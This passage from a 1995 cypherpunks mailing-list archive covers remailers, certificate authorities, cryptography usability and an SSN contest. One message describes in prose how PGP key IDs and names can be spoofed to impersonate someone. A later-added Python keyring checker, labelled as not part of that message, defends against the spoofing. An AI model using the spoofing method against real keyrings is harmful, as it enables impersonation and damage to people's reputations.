From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 27 Nov 1995 22:59:58 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511271450.GAA25350@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 27 Nov 95 6:46:42 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hroller  hroller@c2.org                   +*#####---##    46:11  99.99%
robo     robo@c2.org                      +  ####--*##    39:57  99.75%
amnesia  amnesia@chardos.connix.com                 *+    39:12  99.66%
mix      mixmaster@remail.obscura.com     -- ---_.--.   6:36:54  99.37%
hacktic  remailer@utopia.hacktic.nl       +*  **** ***     8:47  98.47%
replay   remailer@replay.com              +*. ***  ***     6:20  98.31%
c2       remail@c2.org                     + ++++- +**  1:12:49  97.94%
ecafe    cpunk@remail.ecafe.org           +* .-- # ###    46:27  97.81%
flame    remailer@flame.alias.net         +*   **  ***    17:41  97.50%
rmadillo remailer@armadillo.com           ++  +++  +++    39:47  97.23%
portal   hfinney@shell.portal.com         +*#*# #  *##      :28  96.79%
spook    remailer@valhalla.phoenix.net     ** ***  ***    28:42  96.76%
alumni   hal@alumni.caltech.edu            +    *  +*      3:02  96.68%
wmono    wmono@valhalla.phoenix.net        *  ***   **    13:11  96.44%
vishnu   mixmaster@vishnu.alias.net         * ***  * *     8:55  95.93%
extropia remail@extropia.wimsey.com       -------  --   5:04:15  95.47%
penet    anon@anon.penet.fi               ----  -- -+   6:23:22  95.06%
ideath   remailer@ideath.goldenbear.com   -- - -_  .-  11:42:46  95.01%
bsu-cs   nowhere@bsu-cs.bsu.edu            *  ##   # #      :29  90.69%
rahul    homer@rahul.net                  +*  +**  +*-    21:04  98.77%
shinobi  remailer@shinobi.alias.net             +  +*+    24:54  85.54%
ford     remailer@bi-node.zerberus.de     *  +++  ++    6:56:02  80.39%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 28 Nov 1995 01:08:16 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <199511271641.IAA21657@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	You can also snag the apache/ssl webserver and set one up for
yourself, to see what it looks like. Non-commercial use only, as
limited by the RSAREF license.
	The SSL webserver on c2.org is "verisign blessed", so you
can't use it for testing. (Hm, someone should think up a suitably
derisive term of that..)

> 
> Alex Strasheim wrote:
> > 
> > > Basically when the browser finds a new CA that it does know about it prompts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> > 
> > Is anyone running an ssl web server that would let us see how this works?
> 
>   A little bird pointed me toward https://www.secret.org.  I have no
> idea who they are...
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 28 Nov 1995 01:23:55 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: Elliptic curves, current status?
Message-ID: <acdf958f00021004c3b1@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:48 PM 11/26/95, Wei Dai wrote:
....
>The IEEE p1363 group's working draft on elliptic curve standard may help
>you here.  You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps
>
>One reason for confusion about the speed of elliptic curve cryptosystems is
>the small number of implementations.  A paper in Crypto 95 claimed that
>for doing key exchange, an elliptic curve algorithm takes about the same
>time and has about the same level of security as DH with 512 bit modulus,
>and that elliptic curve has a speed advantage if greater security is
>desired.
>
>Wei Dai

Thanks much! I will look at the paper.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an197098@anon.penet.fi
Date: Mon, 27 Nov 1995 17:37:25 +0800
To: cypherpunks@toad.com
Subject: spooky URL
Message-ID: <9511270916.AA16235@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



while visiting  http://www.mcs.com/~candyman/http/boom.html, I noticed that my Netscape's status line mentions an attempt to connect to:

g1.internet-audit.com

a little spooky... any ideas what is happening??


I prefer e-mail. 
reply (anonymously)     to an197098@anon.penet.fi
reply (NON-anonymously) to na197098@anon.penet.fi








--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 27 Nov 1995 22:44:40 +0800
To: cypherpunks@toad.com
Subject: ETH_ic?
Message-ID: <199511271435.JAA05550@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-27-95. NYPaper:

   "An Intel computer security expert runs afoul of the law.
   So much for the 'hacker ethic'?"

      Regardless of whether one sees Randal Schwartz as a
      white knight with questionable judgment or a computer
      criminal who deserves jail time, his tale contains
      valuable lessons for anyone who uses or manages a
      corporate computer system. On the Internet, computer
      programmers and systems administrators have debated
      whether Mr. Schwartz was a hero or a criminal. The
      on-line jury is divided. Most concluded that he was
      guilty of poor judgment, not criminal intent. Some say
      the case has killed the hacker ethic. "If I saw someone
      on the Internet with a security weakness, at this point
      I would be reluctant to act the Good Samaritan and
      report it," said Jeffrey Kegler, an independent software
      consultant in Sunnyvale Calif. "If I saw weakness in
      Intel's machine, I'd keep it to myself."

   ETH_ic?  (7 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 27 Nov 1995 23:00:06 +0800
To: cypherpunks@toad.com
Subject: EXH_ume
Message-ID: <199511271450.JAA07253@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-27-95. NYPaper, Lead story:

   "U.S. Will Deploy Its Spy Satellites on Nature Mission. A
   Huge Environmental Study Gives a New Lease on Life to
   Intelligence Systems."

      The new program is directing spy satellites to study
      about 500 ecologically sensitive sites around the
      world. The data will be archived for future generations of
      scientists and will remain secret for now to conceal the
      abilities of the nation's reconnaissance systems. The
      monitoring effort is led by Medea, an avaricious group of
      about 60 scientists in academia and industry who advise
      the nation's intel clubhouses on the use of secret
      data to "study" the environment. The new reconnaissance
      effort is run for Medea by agony aunt NRO and is
      coordinated by dead-baby CIA.

      The program is very different from the related effort to
      mine old spy-satellite photos for environmental data, a
      wallet-rip the Clinton Administration recently began. So
      too, the program is different from recent intelligence
      gathering that studies natural phenomena for clues to
      ingenious tax milking.

      The Federation of American Scientists said the
      environmental reconnaissance was "potentially a
      watershed in the reform of intelligence," adding, "It
      reflects an expanding teat of national insecurity."

   EXH_ume  (11 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Tue, 28 Nov 1995 02:46:01 +0800
To: cypherpunks@toad.com
Subject: Encrypted Email
Message-ID: <C177ZWAZEVVK8*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    Can anybody briefly summarize for me some options for encrypting email 
    that are secure? I know about PGP but I need something for (my 
    environment) with an easy to use interface (PC-Windows) - for use by 
    people who really aren't very computer literate.
    
    Any ideas?
    
    Thanks!
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Tue, 28 Nov 1995 01:11:16 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <199511271654.KAA02460@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


The Chicago Sun-Times is running a contest in which readers are asked to
send in their social security numbers.  Someone will win a cash prize
after a random drawing. 

I can't figure out the angle on this.  If they simply want to run a
promotional contest, why are they asking for ssn's?  If there's an
ulterior motive, what is it?  Are they going to sell the list?  Would they
have a use for it themselves?

The frustrating thing is that there are probably many millions of
Americans who will give away the keys to the store for next to nothing. 

The feds probably made a tactical error:  instead of trying to force
mandatory key escrow down our throats, they ought to have offered everyone
who is willing to submit to voluntary escrow a chance to win a Chrysler
Minivan.

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 28 Nov 1995 03:33:05 +0800
To: cypherpunks@toad.com
Subject: The future will be easy to use
Message-ID: <Pine.SUN.3.91.951127104220.6244B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Here's a quote from Bill Gates' book:

   The mechanism that will make this possible is based on
   mathematical principles, including what are called
   "one-way functions" and "public-key encryption." These
   are quite advanced concepts, so I'm only going to touch
   on them. Keep in mind that regardless of how complicated
   the system is technically, it will be extremely easy for
   you to use. You'll just tell your information appliance
   what you want it to do and it will seem to happen
   effortlessly.

(Thanks to the anonymous person who typed it in)

   We may not all like Bill Gates, and some of us even boycott his 
software, but we must admit he is a very shrewd businessman and knows 
which side of his toast is buttered. I think this paragraph is right on 
the mark. The competition for which cryptographic protocol wins will be 
decided on the basis of usability.

   The "dark forces" are no doubt aware of this fact, and have already
made some advances in this area. One example is the Fortezza card. 

   If cypherpunks are to have any hope of getting their vision of strong 
crypto implemented and deployed, it has to be in the context of usable 
systems.

   From this perspective, let's take a look at the recent thread on
"establishing trust." Carl Ellison advocates the MOSS alias system. My
understanding of this system is that individual users associate "aliases" 
with public keys. If done right, it can work well. However, from a
usability perspective, it is just one more trouble spot. 
   First, on what basis will users decide which keys are worthy of being
assigned which aliases? Public keys are big hunks of base64 encoded
gibberish. They are difficult to present in a user interface, difficult 
to communicate in alternate, known secure channels (such as telephone 
calls and face to face communication). There is no way that a person 
could memorize one.
   The other issue is how much time and energy the user has to spend 
keeping the alias database up to date. There is no way to communicate 
securely with anyone who's not in the database. If the user is 
communicating with a large number of people, then it's very tempting to 
get sloppy.

   There's no way around it. This kind of system will not make it in the 
big time. As I see it, any system that does must have the following 
properties:

   * Some variant on the Web of Trust.

   * Online key-servers for getting keys in real time.

   * A clean mechanism for validating keys through alternate channels.

   There are three possible outcomes: we build it, the NSA builds it, or 
Microsoft/Netscape builds it. This last outcome might not be so bad, but 
only in the first one can we rely on our principles being advanced.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 28 Nov 1995 01:27:21 +0800
To: Alex Strasheim <alex@proust.suba.com>
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID: <Pine.OSF.3.91.951127110933.4219A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


One reason for the ssn's is that it may be a LEA sponsored promo. If you are 
dumb enough to have a warrant or some other judgement against you and you 
give your ssn and address to a person or entity that you don't know then 
shame on you.

Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 Nov 1995 04:14:42 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511271952.LAA26633@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 AM 11/25/95 -0800, you wrote:
>At 01:53 AM 11/26/95 -0800, anonymous-remailer@shell.portal.com wrote:
>>You'd rather sign before encryption??
>>Doesn't that give you "known plain-text" to attack?
>
>The signature is not known unless the whole message being signed is
>known.

Signatures often have known, or easily guessed, plaintext in them,
like the signer's name or ID number, or various header fields
such as X.509's equivalent to ----- BEGIN PGP ....

>And any encryption scheme that is vulnerable to known plaintext attack
>where only a part of the message is known, is worthless anyway.

DES isn't worthless.  It's a bit weak, but not worthless.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 28 Nov 1995 04:12:19 +0800
To: cypherpunks@toad.com
Subject: Re: GOST for sale
Message-ID: <199511271952.LAA26668@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:43 AM 11/24/95 +0100, Mats Bergstrom <asgaard@sos.sll.se> wrote:
>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe', 
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's 
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Allegedly it uses 'GOST 28147-89',
>whatever that stands for.
>
>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

>From what I've read of GOST, it's really a family of cyphers with
different sets of S-boxes - routine military gets one set, top secret
gets another, civilian govt another, etc.  Aside from possible
differences in security level for the S-boxes, one motivation is
that you can't take civilian govt decryptors and use them to read
or forge top secret military crypto, etc.  If this is correct,
then some sets of S-boxes probably do have trapdoors (at least
susceptibility to differential cryptanalysis); how good are the
ones that Jetico is selling, what credentials do they have to
convince us their cryptanalysis is good enough, and why are they
doing parts of it in hardware?
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Mon, 27 Nov 1995 09:37:52 +0800
To: Carl Ellison <cme@clark.net>
Subject: Re: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <pgpmoose.199511271220.42718@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Carl Ellison <cme@clark.net> wrote:
  Ed Carp wrote:
  >Subject: Re: crypto for porno users
  >To: khijol!clark.net!cme@uunet.uu.net (Carl Ellison)
  >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
  >Cc: khijol!got.net!edge@uunet.uu.net, khijol!toad.com!cypherpunks@uunet.uu.net
  >

  >totally different from this "web of trust" I keep hearing about - and that is
  >*it*.  Do you trust me any more now than before I started signing my postings?

  Actually, in my view, signed postings are the first step.  With those (and
  the right S/W (not there yet)), I get to know that a bunch of postings came
  from the same person.  I even know who they came from:  the person who
  is capable of signing with key 0xXXXXXXXX.

I hate to point this out, but that isn't true.
Anyone can create a key with any chosen keyid and
attach the same publicly known name to it. (see,
eg., the key I signed this with, given below).
The only unforgeable things about a particular
key are:

1. The key itself (you know, the product of the
primes),
2. The key fingerprint (unless MD5 is compromised)
and 
3. The web of trust leading to that key.

So, in practice, you actually have to look at the
key fingerprint of the key used to sign a message,
if you want to be sure of the uniqueness of that
key.

Or you have to only trust keys that come
well-introduced. Back to the Web of Trust.

  Since the only way I have of getting to know the person is through those
  postings, I get to know that person and through that knowledge I decide
  whether or not to trust.

I've been trying to think of the possible
ramifications of spoofing people's names and
keyids on a large scale. And a large scale is
certainly possible -- it only took me about an
hour to create this key. I was originally
intending to use this key as part of a real
project, to gain attention to the project, but the
more I thought about it the more I worried about
the implications. This "coming out" invalidates
any chance of that happening.

There are two bad things I can think of.
Suppose I want to somehow attack Fred. I can
create a key with the same ascii text associated
with it very easily. With only a little more
effort, I can also duplicate the keyid. PGP adds
new keys at the front of the keyring, so if I
start distributing this new key widely, it will
appear in keyrings before the "real" Fred's.
Whenever this happens automatically, there is some
possibility that the wrong key will be used for
some operations. PGP doesn't help much, because it
is hard to specify the key unambiguously in this
case.

PGP uses more than just the visible part of the
keyID. So at least it will choose the right key to
verify signatures, right? Maybe not. I can apply
the same spoofing technique to the whole internal
keyID, and generate a key that even PGP can't
tell is the wrong one. I think that when PGP tried
to check the signature on a message from the "real"
Fred that it would notice that it had applied the
wrong key, but I'm not absolutely sure on this
point. Anyway, an inattentive or somewhat
automated user will merely notice that the
document signature fails to check out, essentially
slurring the "real" Fred's reputation.

Any other possible attacks?

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLkSAqaauZzerb7vAQFpbgP+KpPj1SH746nmJca3VmEGU13t/enQL5GT
FmCGHqnqI757GRNOiHMXnNe8mMdwMn67UgxU/3a7R/UU7rspGH3P/IrmDH0NnDHG
z5QuhQcutgswz7ncNeuUxi6BRHP12SM/aNnLqCmT308zd1sL1BNL/CUgPdxNBnFT
kCe5dS0FVaI=
=mopc
-----END PGP SIGNATURE-----

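[Added example, not part of Greg Rose's message and not PGP's own code: a keyring check that flags entries sharing a key ID and selects a key only by pinned fingerprint. It assumes the PGP 2.x RSA key format, where the key ID is the low 64 bits of the modulus and the fingerprint is MD5 over the modulus and exponent bytes; the function names are hypothetical and the sample moduli are constructed integers, not real RSA keys.]

```python
import hashlib
from collections import defaultdict


def mpi_body(x: int) -> bytes:
    """Big-endian bytes of a multiprecision integer, without a length prefix."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def key_id(n: int) -> str:
    """PGP 2.x RSA key ID: the low 64 bits of the modulus (16 hex digits)."""
    return f"{n & 0xFFFFFFFFFFFFFFFF:016X}"


def fingerprint(n: int, e: int) -> str:
    """PGP 2.x RSA fingerprint: MD5 over modulus bytes, then exponent bytes."""
    return hashlib.md5(mpi_body(n) + mpi_body(e)).hexdigest().upper()


def normalize_fp(text: str) -> str:
    """Accept the spaced form printed in signatures ('35 0A 79 ...')."""
    return "".join(text.split()).upper()


def ambiguous_key_ids(keyring):
    """Map each key ID that is shared by more than one distinct key
    to the sorted list of fingerprints claiming it."""
    by_id = defaultdict(set)
    for key in keyring:
        by_id[key_id(key["n"])].add(fingerprint(key["n"], key["e"]))
    return {kid: sorted(fps) for kid, fps in by_id.items() if len(fps) > 1}


def lookup_by_id(keyring, kid: str):
    """ID-based selection: first entry in keyring order whose key ID ends
    with the given hex digits. This is the ambiguous lookup to avoid."""
    wanted = kid.upper()
    for key in keyring:
        if key_id(key["n"]).endswith(wanted):
            return key
    return None


def select_by_fingerprint(keyring, pinned: str):
    """Position-independent selection: exactly one key must match the
    fingerprint obtained through a separate channel."""
    want = normalize_fp(pinned)
    matches = [k for k in keyring if fingerprint(k["n"], k["e"]) == want]
    if len(matches) != 1:
        raise LookupError(f"{len(matches)} keys match pinned fingerprint")
    return matches[0]


# Constructed sample data: plain integers standing in for RSA moduli.
E = 65537
LOW64 = 0x5A17C0DE0BADF00D                # shared low 64 bits (constructed)
REAL_N = (0xC0FFEE << 488) | LOW64        # "real" Fred, 512-bit stand-in
LOOKALIKE_N = (0xFACADE << 488) | LOW64   # same key ID, different key
ALICE_N = (0xDECADE << 488) | 0x1234567890ABCDEF

# Newest first: the message notes that new keys go at the front of the ring.
KEYRING = [
    {"userid": "Fred <fred@example.org>", "n": LOOKALIKE_N, "e": E},
    {"userid": "Fred <fred@example.org>", "n": REAL_N, "e": E},
    {"userid": "Alice <alice@example.org>", "n": ALICE_N, "e": E},
]

if __name__ == "__main__":
    for kid, fps in ambiguous_key_ids(KEYRING).items():
        print(f"key ID {kid} is claimed by {len(fps)} different keys:")
        for fp in fps:
            print("   fingerprint", fp)
    hit = lookup_by_id(KEYRING, "0BADF00D")
    print("lookup by ID picks the real key:", hit["n"] == REAL_N)
    pinned = fingerprint(REAL_N, E)  # stands in for a value read over the phone
    print("lookup by fingerprint picks the real key:",
          select_by_fingerprint(KEYRING, pinned)["n"] == REAL_N)
```
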




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 28 Nov 1995 01:51:27 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <9511271738.AA28149@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 11/27/95 -0600, Alex Strasheim wrote:
>The Chicago Sun-Times is running a contest in which readers are asked to
>send in their social security numbers.  Someone will win a cash prize
>after a random drawing. 
>
>I can't figure out the angle on this.  If they simply want to run a
>promotional contest, why are they asking for ssn's?  If there's an
>ulterior motive, what is it?  Are they going to sell the list?  Would they
>have a use for it themselves?

Alex -

  There may be *an ulterior motive* of getting the person's ssn, i.e., for
the purpose of the newspaper (and the winner) reporting winnings to IRS.  In
addition, the newspaper may also feel that, in selecting a 10-digit number,
it probably will not repeat such as someone's birthdate.  Personally, I lean
towards the former.
>
>The frustrating thing is that there are probably many millions of
>Americans who will give away the keys to the store for next to nothing. 
>The feds probably made a tactical error:  instead of trying to force
>mandatory key escrow down our throats, they ought to have offered everyone
>who is willing to submit to voluntary escrow a chance to win a Chrysler
>Minivan.

  I agree with you.  I believe *greed* is the operating word....

Regards-
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Tue, 28 Nov 1995 05:04:59 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511270737.XAA20199@netcom16.netcom.com>
Message-ID: <Pine.SUN.3.90.951127123642.15406A-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Bill Frantz wrote:

> At 11:40 11/26/95 -0800, Thomas E Zerucha wrote:
> >That would be interesting - even with the speaker "off" the power surge 
> >causes clicking and other signs.  Not to mention that the interrupt count 
> >would start moving (of course the virus could replace the entire OS and 
> >would only have to find 300K chunks to hide in).
> 
> I looked at the memory usage on my 1meg Mac and 5meg is used for the
> system.  I have no idea what it is all being used for.  A lot can hide
> there.
> 

But it would also have to hide in something you load at boot time.  For 
it to propagate there, it would have to make copies of itself. When crond 
and inetd and named all grow over 400K I get curious.  Dos has small 
usage, and Linux provides a link map (or I can checksum entry points or 
such).  Another fun thing to do is pkexe or gzexe.  The latter turns an 
exe into a shell script.  Patching compressed files is very difficult.

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 28 Nov 1995 02:29:09 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Cypherpunk Certification Authority (fwd)
Message-ID: <Pine.A32.3.91.951127131057.39184B-100000@POWERED.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 Nov 1995, Robert Hettinga wrote:

> >Is this another one of those LD tentacles? ;)
> 
> Must that or a spoof of some kind... "She" didn't sign it, and "she" claims
> to have issued a signature...

Methinks some of us need to read up on undeniable interactive signature 
systems.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMLn/J75ALmeTVXAJAQGL5QL9HE+t0zKGVni03w4DvV2W1lj1807eaNRp
xD4IJcEUJ+JVk4lUJQ+zNvOf81FMPG+0QNq9tqOEDNqiG9vemD7B8C7et5PH0pFb
ktOeAw5WywsnwSeRleId1ukBktDdZR4v
=QueN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 28 Nov 1995 05:20:26 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: The future will be easy to use
Message-ID: <v02120d08acdfd6f40be1@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 AM 11/27/95, Raph Levien wrote:

.. stuff..

>The competition for which cryptographic protocol wins will be
>decided on the basis of usability.
.. stuff..
>   If cypherpunks are to have any hope of getting their vision of strong
>crypto implemented and deployed, it has to be in the context of usable
>systems.

.. stuff..

>   There's no way around it. This kind of system will not make it in the
>big time. As I see it, any system that does must have the following
>properties:
>
>   * Some variant on the Web of Trust.
>
>   * Online key-servers for getting keys in real time.
>
>   * A clean mechanism for validating keys through alternate channels.
>
>   There are three possible outcomes: we build it, the NSA builds it, or
